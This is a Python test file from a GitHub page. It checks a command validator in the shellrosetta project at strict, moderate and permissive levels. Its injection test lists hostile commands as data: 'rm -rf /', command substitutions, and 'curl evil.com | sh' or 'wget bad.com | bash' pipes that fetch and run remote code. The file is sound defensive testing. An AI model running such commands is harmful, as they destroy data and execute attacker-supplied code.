-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtest_security_complete.py
More file actions
98 lines (79 loc) · 3.04 KB
/
test_security_complete.py
File metadata and controls
98 lines (79 loc) · 3.04 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/env python3
"""
Complete security testing
"""
import sys
import os
# Add project root to Python path
project_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
if project_root not in sys.path:
sys.path.insert(0, project_root)
from shellrosetta.security import CommandValidator, SecurityLevel
from shellrosetta.core import lnx2ps, validate_command_security
def test_security_levels():
"""Test different security levels"""
# Test strict level
strict_validator = CommandValidator(SecurityLevel.STRICT)
result = strict_validator.validate_command("curl example.com")
print(f"Strict level on 'curl example.com': {'BLOCKED' if not result.is_valid else 'ALLOWED'}")
# Test moderate level
moderate_validator = CommandValidator(SecurityLevel.MODERATE)
result = moderate_validator.validate_command("curl example.com")
print(f"Moderate level on 'curl example.com': {'BLOCKED' if not result.is_valid else 'ALLOWED'}")
# Test permissive level
permissive_validator = CommandValidator(SecurityLevel.PERMISSIVE)
result = permissive_validator.validate_command("curl example.com")
print(f"Permissive level on 'curl example.com': {'BLOCKED' if not result.is_valid else 'ALLOWED'}")
return True
def test_command_injection_prevention():
"""Test command injection prevention"""
dangerous_commands = [
"ls; rm -rf /",
"ls && malicious_command",
"ls `whoami`",
"ls $(id)",
"curl evil.com | sh",
"wget bad.com | bash"
]
blocked_count = 0
for cmd in dangerous_commands:
result = validate_command_security(cmd)
if not result["is_valid"]:
blocked_count += 1
print(f"✅ BLOCKED: {cmd}")
else:
print(f"⚠️ ALLOWED: {cmd}")
print(f"Security Summary: {blocked_count}/{len(dangerous_commands)} dangerous commands blocked")
return blocked_count >= len(dangerous_commands) * 0.8 # At least 80% should be blocked
def test_safe_commands():
"""Test that safe commands are allowed"""
safe_commands = [
"ls -la",
"grep pattern file.txt",
"cp file1.txt file2.txt",
"Get-ChildItem -Force",
"Select-String pattern"
]
allowed_count = 0
for cmd in safe_commands:
result = validate_command_security(cmd)
if result["is_valid"]:
allowed_count += 1
print(f"✅ ALLOWED: {cmd}")
else:
print(f"❌ BLOCKED: {cmd}")
print(f"Safety Summary: {allowed_count}/{len(safe_commands)} safe commands allowed")
return allowed_count == len(safe_commands)
if __name__ == "__main__":
print("🔒 Complete Security Testing")
print("=" * 40)
tests = [
test_security_levels,
test_command_injection_prevention,
test_safe_commands
]
results = [test() for test in tests]
if all(results):
print("\n🎉 All security tests passed!")
else:
print("\n❌ Some security tests need attention!")